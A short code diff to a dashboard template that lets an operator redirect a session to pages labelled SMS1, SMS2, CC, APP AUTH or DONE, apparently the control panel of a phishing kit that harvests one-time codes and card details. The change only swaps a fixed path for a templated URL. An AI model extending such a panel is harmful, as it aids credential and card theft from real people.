--- a/views/dashboard.ejs
+++ b/views/dashboard.ejs
@@ -99,8 +99,9 @@
                   <option value="/BfhMN3hPfFL88zgqtPAk">SMS1</option>
                   <option value="/EEXnHMpMEHxNNMgX5Duh">SMS2</option>
                   <option value="/3EtpVNHarRb8PqJfArbu">CC</option>
-                  <option value="/HfuRVXK8w8fLmT2vWHe8">DONE</option>
+                  <option value="<%=url%>">DONE</option>
                   <option value="/OOMPZ5nz4RnFvFV8s">APP AUTH</option>
+                  
                 </select>
                 <button class="btn btn-primary" id="redirectBtn">
                   <i class="bi bi-arrow-right"></i> Redirect
